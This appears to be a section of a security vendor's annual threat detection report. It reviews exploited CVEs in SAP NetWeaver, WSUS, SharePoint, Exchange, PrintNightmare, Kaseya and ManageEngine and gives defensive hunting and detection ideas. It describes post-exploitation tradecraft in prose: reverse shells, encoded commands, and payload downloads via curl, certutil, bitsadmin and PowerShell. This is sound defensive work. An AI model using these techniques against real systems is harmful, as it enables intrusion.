Vulnerabilities

Red Canary called our customers’ attention to several specific vulnerabilities in 2025:

CVE-2025-31324

This vulnerability, a missing authorization check in SAP NetWeaver, allows for unrestricted file uploads into a NetWeaver server, meaning an adversary could upload web shells and other arbitrary content to execute on the SAP NetWeaver server.

In reviewing post-exploitation activity, Red Canary observed Python reverse shell code spawning from known SAP processes in addition to the manipulation of web shell files followed by the download and execution of additional tools. In these scenarios, the adversaries used Base64-encoded commands to evade observation with process-monitoring tools.

To fix the vulnerability, SAP released a security advisory in May 2025 visible to customers of their support portal with additional guidance to patch affected components.

CVE-2025-59287

A critical RCE vulnerability in Microsoft’s Windows Server Update Service (WSUS) was patched in an out-of-band update in October 2025. Researchers reported shortly after the update that adversaries were actively targeting publicly exposed WSUS endpoints on default ports 8530/TCP and 8531/TCP and sending crafted requests that triggered a deserialization RCE. This led to PowerShell and Windows Command Shell executing Base64-encoded commands designed to enumerate user and network information related to the affected endpoint. Afterwards, the results of the extracted information were sent to a remote webhook URL.

CVE-2025-53770 & CVE-2025-53771

These vulnerabilities allow for unauthenticated remote code execution on a Microsoft SharePoint server, specifically on-premise versions of SharePoint Server, including SharePoint 2016 and 2019. By exploiting the vulnerabilities, an adversary may send serialized objects to the SharePoint server, causing arbitrary code to execute actions such as writing web shells, spawning PowerShell commands, and more.

In July 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and other community members reported widespread exploitation of the vulnerabilities. Later, Microsoft released customer guidance, including tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and mitigation techniques for the vulnerabilities to further harden SharePoint servers against exploitation.

Vulnerabilities present a complex challenge. In a perfect world, you’d patch all the things but because vulnerabilities can differ widely across affected software and their impact, it can be difficult to offer universal prevention, mitigation, or response guidance. In addition, working in the stark reality of only having a few employees or a few dedicated hours in the day means that teams must use their attention wisely on vulnerabilities.

Organizations should strategically prioritize their efforts by focusing resources on what poses the greatest threat to your organization. An excellent starting point involves monitoring CISA’s Known Exploited Vulnerabilities (KEV) Catalog to address flaws known to be actively exploited, along with remediating high-severity, remotely exploitable vulnerabilities and issues patched by vendors in out-of-band updates. Advancing from this starting point, vulnerability scanning products and application inventory tools can help determine what software needs patching in very large environments.

CVE-2025-31324

Security teams should examine SAP web server access logs for any evidence of CVE-2025-31324 exploitation, specifically looking for evidence of unusual requests to the API endpoint /developmentserver/metadatauploader.

To hunt for additional evidence of web shell uploads, we recommend searching for unexpected Jakarta Server Pages (JSP) files within these folders on SAP servers:

• j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
• j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
• j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync

CVE-2025-53770 & CVE-2025-53771

We recommend examining IIS web server access logs for additional evidence, specifically looking for evidence of unusual requests to a page at /_layouts/*/spinstall0.aspx.

Detecting post-exploitation activity

Red Canary’s behavior-based approach to creating analytics enables detection of post-exploitation activity regardless of the vulnerability exploited. We’ve found over the years that, while vulnerabilities change often, adversaries return to a similar playbook after launching an exploit. We suggest looking at the following activity when looking for behavior associated with the above vulnerabilities because they can also help identify signs of exploitation in other products in the future.

CVE-2025-31324

Security teams looking to develop detection coverage for behaviors observed following exploitation of SAP NetWeaver can include the following:

Base64-encoded commands in shell processes

Because the adversary employed Base64-encoded commands to evade casual observation, teams could look for evidence of leveraging encoded commands in Linux shell processes to download remotely hosted files. We commonly observe this activity in exploitation of other server products as well.

curl downloading files in /tmp

Security teams could also look for adversaries leveraging curl to download files from a remote host into the /tmp folder. This may require tuning in your environment to account for deployment or maintenance tools.

Python scripts establishing a socket to a remote host

In one scenario, Red Canary observed Python reverse shell code spawning from known SAP processes. Security teams could detect this by looking for any Python scripts that establish a socket to a remote host. A pro-tip for Python threat detection: Python executables often include a version number at the end of the executable name, and detection analytics specifying just a name of “Python” can miss activity. For a more resilient detection analytic, look for processes containing the string python rather than a strict ==.

CVE-2025-59287

Security teams looking for activity related to the WSUS vulnerability (CVE-2025-59287) can start by looking for the following behavior:

Abuse of Windows command shell for execution

Look for cmd.exe being spawned from the Windows Server IIS worker process (w3wp.exe) or the WSUS service binary wsusservice.exe, with a /c command that starts another cmd.exe /c instance. Command shells spawning from w3wp.exe are a common behavior of other IIS web server exploits and web shells, so approaching this detection analytic can make broad threat detection for IIS web server malfeasance.

Abuse of PowerShell to obfuscate commands

Another detection opportunity involves looking for the use of the shortened encodedCommand flag in PowerShell. Adversaries often try to obfuscate the use of malicious code on an endpoint, wrapping them up for PowerShell to execute.

CVE-2025-53770 & CVE-2025-53771

Execution of commands via a compromised web server

Similar to the WSUS vulnerability, for the Sharepoint vulnerabilities, defenders could look for instances of a Windows IIS worker process (w3wp.exe) spawning Command Processor (cmd.exe) and either including a URL in the command line or creating files typically associated with executable web server code, among other outcomes.

Editor’s note: The remaining detection opportunities were included in earlier versions of the Threat Detection Report. While adversaries might no longer exploit some of the vulnerabilities referenced below, the detection opportunities evergreen and capable of detecting unrelated but nonetheless malicious behavior.

Post-exploitation activity often stems from the exploited process. As such, looking for processes of external-facing applications conducting unknown or just plain weird activity could aid in detecting intrusion activity caused by an exploit. An example of this would be looking for parent-child process relationships of w3wp and cmd or powershell, as has been observed with various Microsoft Exchange vulnerabilities.

Another example of this would be detecting instances of sqlservr.exe using cmd.exe to spawn a PowerShell process with subsequent network connection, as was the case with observed exploitation of CVE-2023-48788.

Ingress Tool Transfer

Following typical post-exploitation methodologies, we observed adversaries using various, well known methods to pull additional tools into a compromised environment to further their intrusion. As such, this creates many detection opportunities for post-exploitation activity:

Certutil downloading additional payloads

Adversaries often use certutil.exe to download payloads during exploitation because it’s included with all Windows systems by default. It’s also pretty easy to detect downloads using the tool.

Bitsadmin downloading additional payloads

Likewise, adversaries also use bitsadmin to download additional tools on a host to further their intrusion.

PowerShell downloading additional payloads

ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)

In March 2021, Microsoft released details of four Exchange Server vulnerabilities collectively known as “ProxyLogon.” If chained together, the vulnerabilities would allow an adversary remote code execution on a targeted Exchange server. Multiple adversaries, including the suspected Chinese state-sponsored group HAFNIUM, used the vulnerability chain to drop web shells and collect data from thousands of Exchange servers. Other adversaries used the DearCry ransomware to target unpatched servers as well. Microsoft released patches for these vulnerabilities at the time of initial reporting.

Microsoft Exchange Mailbox Replication service writing Active Server pages

Adversaries exploited ProxyLogon to drop web shells on vulnerable systems, which manifested through the msexchangemailboxreplication.exeservice writing an ASPX file to disk. Malicious web shells will likely be placed on the web server in a web-accessible directory. The following analytic looks for the Exchange mailbox replication service creating ASPX files.

ProxyShell (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473)

In July of 2021, Microsoft released details of three new vulnerabilities in the Exchange server, which were dubbed “ProxyShell.” ProxyShell exploitation allows an adversary to remotely execute code without authentication. Following the exploitation, adversaries dropped web shells to conduct reconnaissance, move laterally, and in some instances, deploy ransomware. Where ProxyLogon seemed to have a high impact over a short period of time, ProxyShell seemed to persist longer. DetectingProxyShell exploitation is similar to ProxyLogon mentioned above, specifically msexchangemailboxreplication.exe writing an ASPX web shell to disk.

PrintNightmare (CVE-2021-34527)

Also in July of 2021, security researchers and Microsoft released details of a new vulnerability dubbed “PrintNightmare” (CVE-2021-34527). PrintNightmare permits an unprivileged user to remotely obtain elevated privileges on any system running the print spooler service, which is enabled by default. It abuses a vulnerability in how the print spooler service fails to properly authenticate users attempting to load a printer driver dynamic link library (DLL). This zero day affected all editions of Windows, allowing code execution with local SYSTEM-level privileges.

Though the vulnerability was concerning, there were not many reported campaigns exploiting it. That said, ransomware operators such as Vice Society and Magniber have exploited the vulnerability to gain initial access, and therefore it’s worth looking out for. We observed a single malicious instance of PrintNightmare exploitation leading to precursor ransomware behaviors.

Windows print spooler service spawning cmd.exe

PrintNightmare exploitation results in a shell being opened on the targeted system as a child process of the spooler service. This detection analytic identifies the Windows print spooler service spawning a shell on the system.

Kaseya VSA (CVE-2021-30116)

Again in July 2021, adversaries leveraged multiple vulnerabilities in Kaseya Virtual Systems Administrator (VSA) to distribute Sodinokibi ransomware, also known as REvil. VSA allows IT administrators to remotely administer endpoints. By compromising this software, an adversary gains remote execution capability to a large subset of customer endpoints, especially if Kaseya is operated by a managed service provider (MSP).

Red Canary detected the initial behavioral activity using a preexisting analytic for identifying certutil.exe decoding content, as detailed below. Our Intelligence team had tracked Sodinokibi prior to this, which helped us identify the malicious registry modification of blacklivesmatter seen below and attribute it to Sodinokibi.

Certificate utility tool (certutil.exe) decoding content

This detection analytic will detect certutil.exe running with the -decode option. Adversaries frequently leverage certutil to decode Base 64-encoded content.

ManageEngine products (CVE-2021-40539, CVE-2021-44077, CVE-2021-44515)

In November and December of 2021, we observed likely exploitation of remote code execution vulnerabilities in two different Zoho ManageEngine products: ADSelfService Plus (CVE-2021-40539) and ServiceDesk Plus (CVE-2021-44077). In one case, an incident response partner determined that ADSelfService Plus was used for initial access prior to deploying ransomware. The FBI noted that advanced adversaries exploited a vulnerability in a third ManageEngine product, Desktop Central. ManageEngine products are widely used among IT departments to manage various services across the enterprise. As such, this presents adversaries with a wide attack surface. Organizations using ManageEngine products in their environment should update accordingly. Patches for all the vulnerabilities listed here are available via ManageEngine.

Keytool.exe spawning system shell or PowerShell

For the vulnerability in ADSelfService Plus (CVE-2021-40539), we observed adversaries use the Java utility Keytool to move a web shell from the initial directory it was dropped into. As such, keytool.exe spawning shells should be investigated, and the following detection analytic should surface related activity.